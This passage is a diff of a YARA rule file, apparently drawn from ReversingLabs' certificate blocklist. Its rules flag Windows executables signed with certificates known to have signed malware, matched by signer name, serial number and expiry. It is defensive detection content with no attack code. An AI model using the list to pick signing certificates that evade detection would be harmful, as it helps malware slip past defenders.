+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sportsonline24 B.V." and ( pe.signatures [ i ] . serial == "00:82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" or pe.signatures [ i ] . serial == "82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" ) and 1605117874 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_22E2A66E63B8Cb4Ec6989Bf7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9A8Bcfd05F86B15D0C99F50Cf414Bd00 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5c028a6c-890c-54f1-aea2-ac04ce654907"
+		id = "4446aead-9505-545a-8d3a-6ad844d348d3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13638-L13654"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2099c508d1fd986f34f14aa396a5aaa136e2cdd2226099acdca9c14f6f6342eb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6578-L6596"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "803d70dddeff51b753b577ea196b12570847c6875ae676a2d12cf1ca9323be34"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17623,21 +42288,21 @@ rule REVERSINGLABS_Cert_Blocklist_22E2A66E63B8Cb4Ec6989Bf7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sivi Technology Limited" and pe.signatures [ i ] . serial == "22:e2:a6:6e:63:b8:cb:4e:c6:98:9b:f7" and 1466995365 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AI Software a.s." and ( pe.signatures [ i ] . serial == "00:9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00" or pe.signatures [ i ] . serial == "9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00" ) and 1592442000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_654B406De388Ec2Aec253Ff2Ba4C4Bbd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_95E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9820112d-d59b-57e7-ae78-7b427f70d529"
+		id = "6b992971-6a1f-53e3-8651-f25a6b761c41"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13656-L13672"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a1aadaded55c8b0d85ac09ba9ab27fefaeec2969cdabaf26ff0c41bf33422ddc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6598-L6616"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bd198665ae952e11c91adc329908e3cd55a55365875200cd81d2f71fd092f1fe"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17647,21 +42312,21 @@ rule REVERSINGLABS_Cert_Blocklist_654B406De388Ec2Aec253Ff2Ba4C4Bbd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yijiajian (Amoy) Jiankan Tech Co.,LTD." and pe.signatures [ i ] . serial == "65:4b:40:6d:e3:88:ec:2a:ec:25:3f:f2:ba:4c:4b:bd" and 1398902400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kommservice LLC" and ( pe.signatures [ i ] . serial == "00:95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" or pe.signatures [ i ] . serial == "95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" ) and 1604933746 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_78D1817Ebcf338B4E9C810F9740A726B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_133565779808C3B79D8E3F70A9C3Ffac : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3d0a97a4-c45a-5238-a287-867529b470cb"
+		id = "bc3f54a6-723d-5de5-9a59-2be8a005cedc"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13674-L13690"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "62e59130ef0ac35b17a265bb8bc2031cac6a75c11925ccb21eb4601b8fbe1a63"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6618-L6634"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b9fb2e3cc150b0278e67c673f7c01174c30b2cc4458c9c5e573661071795b793"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17671,21 +42336,21 @@ rule REVERSINGLABS_Cert_Blocklist_78D1817Ebcf338B4E9C810F9740A726B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CONSTRUTORA NOVO PARQUE LTDA - ME" and pe.signatures [ i ] . serial == "78:d1:81:7e:bc:f3:38:b4:e9:c8:10:f9:74:0a:72:6b" and 1431734400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Istok" and pe.signatures [ i ] . serial == "13:35:65:77:98:08:c3:b7:9d:8e:3f:70:a9:c3:ff:ac" and 1605019819 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_45Fbcdb1Fbd3D702Fb77257B45D8C58E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6bfd7c1d-2608-5ca0-8e1e-04c73588895a"
+		id = "4668ceb3-8bf2-5be4-9a1a-d0d902c35cf0"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13692-L13708"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "441e10f49515d75ee9e8983ba4321377fee13a91ca5eeddc08b393136ce8ccfd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6636-L6654"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f13f9b70a2a3187522e4fff45a8a425863ad6242f82592aa9319c8d5fddeeefa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17695,21 +42360,21 @@ rule REVERSINGLABS_Cert_Blocklist_45Fbcdb1Fbd3D702Fb77257B45D8C58E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "45:fb:cd:b1:fb:d3:d7:02:fb:77:25:7b:45:d8:c5:8e" and 1476662400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orangetree B.V." and ( pe.signatures [ i ] . serial == "00:7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" or pe.signatures [ i ] . serial == "7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" ) and 1606159604 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4B5D8Ed5Ca011679F141F124 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bad35Fd70025D46C56B89E32B1A3954C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c8bc0968-29d0-51a9-8cfe-7c8f447cef3d"
+		id = "871e399f-8498-5d66-ab5e-24e48491124f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13710-L13726"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "39ff0d5fd711524ce181596033d1d51579cd086eb20b87722aebf39623bbaa17"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6656-L6674"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1020250fc5030e50bc1e7d0f0c5a77e462a53f47bfcc4383c682b34fed567492"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17719,21 +42384,21 @@ rule REVERSINGLABS_Cert_Blocklist_4B5D8Ed5Ca011679F141F124 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4b:5d:8e:d5:ca:01:16:79:f1:41:f1:24" and 1480644725 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fort LLC" and ( pe.signatures [ i ] . serial == "00:ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c" or pe.signatures [ i ] . serial == "ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c" ) and 1604937337 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_33671F1Bcbd0F5E231Fc386F4895000E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7B91468122273Aa32B7Cfc80C331Ea13 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0863e1ed-7b9c-5a60-82ac-eadc3c23fbd9"
+		id = "2a949015-3b7b-5123-8df1-f2199ef636c9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13728-L13744"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9199c8d76e3390ec9038808b4e88b803b3f3d6966af6206d0c9968d9ab673f31"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6676-L6692"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "49d6fd8b325df4bc688275a09cee35e1040172eb6f3680aa2b6f0f3640c0782e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17743,21 +42408,21 @@ rule REVERSINGLABS_Cert_Blocklist_33671F1Bcbd0F5E231Fc386F4895000E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALAIS, OOO" and pe.signatures [ i ] . serial == "33:67:1f:1b:cb:d0:f5:e2:31:fc:38:6f:48:95:00:0e" and 1491868800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "7b:91:46:81:22:27:3a:a3:2b:7c:fc:80:c3:31:ea:13" and 1586942863 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_32Bc299F0694C19Ec21E71265B1D7E17 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3E267B5D14Cdf1F645C1Ec545Cec3Aee : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fa2302c3-4002-5bf0-812b-45298abbda8d"
+		id = "adff6ae2-076c-5c97-9fea-f95d770a3821"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13746-L13762"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cb522e3084d382c451a8b040095e75582675f90dbb588e370f2f0054f4c2d14b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6694-L6710"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e36ae57d715a71aa7d26dd003d647dfa7ab16d64e5411b6c49831544fc482645"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17767,21 +42432,21 @@ rule REVERSINGLABS_Cert_Blocklist_32Bc299F0694C19Ec21E71265B1D7E17 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "32:bc:29:9f:06:94:c1:9e:c2:1e:71:26:5b:1d:7e:17" and 1474416000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "3e:26:7b:5d:14:cd:f1:f6:45:c1:ec:54:5c:ec:3a:ee" and 1579825892 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7B75C6B0A09Afdb9787F6Dff75Ae7844 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ae6D3C0269Ef6497E14379C51A8507Ba : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0b34c7ce-fa75-5340-a473-fa87fab93b86"
+		id = "5b8e7730-cb8b-5c51-9784-d944453bc898"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13764-L13780"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8fd125a526b3433fbb8a5c6fa74ce0b0e2de8ff789880c355625d4140cd902a2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6712-L6730"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "23570962c80bddce28a3dee9d4d864cf3cf64018eec6fbcbdd3ca2658c9f660f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17791,21 +42456,21 @@ rule REVERSINGLABS_Cert_Blocklist_7B75C6B0A09Afdb9787F6Dff75Ae7844 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "7b:75:c6:b0:a0:9a:fd:b9:78:7f:6d:ff:75:ae:78:44" and 1476662400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VELES PROPERTIES LIMITED" and ( pe.signatures [ i ] . serial == "00:ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba" or pe.signatures [ i ] . serial == "ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba" ) and 1578566034 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_167Fd1295B3Bb102Dbb37292C838E7Cd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "42cf5f07-4c43-567c-a517-42c898658ab8"
+		id = "f0050a52-65d5-54b2-b06d-08812af98948"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13782-L13798"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1cc7d441291fd9c4dc37320d411f94fb362523d47d37ab35c20b3ac9d4cd75cb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6732-L6750"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "230d33f0d1d31d4cb76bf3b13f109d3cc9ace846daef145e1dc7666b33c8a42a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17815,21 +42480,21 @@ rule REVERSINGLABS_Cert_Blocklist_167Fd1295B3Bb102Dbb37292C838E7Cd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "16:7f:d1:29:5b:3b:b1:02:db:b3:72:92:c8:38:e7:cd" and 1476921600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pivo ZLoun s.r.o." and ( pe.signatures [ i ] . serial == "00:fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" or pe.signatures [ i ] . serial == "fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" ) and 1604019600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_253Ad25E39Abe8F8Fda9Fcf6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7C061Baa3118327255161F6A7Fa4E21D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f09ca101-dd40-54d8-9235-1faf1e774dd4"
+		id = "f597956a-d11b-54e4-91b6-0572c0b10279"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13800-L13816"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1d46ccaa136cd7be30ffbf0eb09eb6485c543ff4bdbe99fa7ea3846841cbd41b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6752-L6770"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4193fce69af03b3521a3cc442b762c52f8585b44fa6b0bd78b9ace171b807ed4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17839,21 +42504,21 @@ rule REVERSINGLABS_Cert_Blocklist_253Ad25E39Abe8F8Fda9Fcf6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "25:3a:d2:5e:39:ab:e8:f8:fd:a9:fc:f6" and 1538662130 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YUTAKS, OOO" and ( pe.signatures [ i ] . serial == "00:7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d" or pe.signatures [ i ] . serial == "7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d" ) and 1599611338 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A9C1523Cb2C73A82771D318124963E87 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_04332C16724Ffeda5868D22Af56Aea43 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b21365d0-eaff-51da-8b8e-6a6ee75a5b95"
+		id = "1e5a2708-2875-50ab-af6b-3be91f38e13f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13818-L13836"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "87e314d14361f56935b7a8fb93468cfaf2c73e16c25d68a61ec80ad9334d3115"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6772-L6788"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6b62d5c7a3c6e3096797cd2f515d86045fa77682638bda44175d05c5b6c5bbc0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17863,21 +42528,21 @@ rule REVERSINGLABS_Cert_Blocklist_A9C1523Cb2C73A82771D318124963E87 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTERA" and ( pe.signatures [ i ] . serial == "00:a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87" or pe.signatures [ i ] . serial == "a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87" ) and 1499731200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bespoke Software Solutions Limited" and pe.signatures [ i ] . serial == "04:33:2c:16:72:4f:fe:da:58:68:d2:2a:f5:6a:ea:43" and 1597971601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_68E1B2C210B19Bb1F2A24176709B165B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_030012F134E64347669F3256C7D050C5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e17bf185-3dfc-5a2f-a87f-525ac0e4084b"
+		id = "1e61a781-d5fb-5f05-81c4-3cc697ece13c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13838-L13854"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8e88ad992c58d37ff1ac34e2d9cf121f3bc692ae78c0ad79140974abdec2f317"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6790-L6806"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1a55856bfa4c632b2b0404686dc7ba5e7238b619dd4d2eb68c3d291bc86e52c4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17887,21 +42552,21 @@ rule REVERSINGLABS_Cert_Blocklist_68E1B2C210B19Bb1F2A24176709B165B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "68:e1:b2:c2:10:b1:9b:b1:f2:a2:41:76:70:9b:16:5b" and 1474502400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Futumarket LLC" and pe.signatures [ i ] . serial == "03:00:12:f1:34:e6:43:47:66:9f:32:56:c7:d0:50:c5" and 1604036657 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5C88313Bd98Bde99C9B9Ac1408A63249 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fa3Dcac19B884B44Ef4F81541184D6B0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5108fa8f-3fe6-518c-9bae-b1c44a0ec7a8"
+		id = "574ee0d4-ba7c-5c74-b711-222f92196f4a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13856-L13872"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f958e46e00bf4ab8ecf071502bcda63a84265029bc9c72cea1eaaf72e9003a84"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6808-L6826"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "324de84cb8c2f5402c9326749e3456e11312828df2523954fd84f7fb3298fdf3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17911,21 +42576,21 @@ rule REVERSINGLABS_Cert_Blocklist_5C88313Bd98Bde99C9B9Ac1408A63249 : INFO FILE
 		importance = 25
 
 	condition:
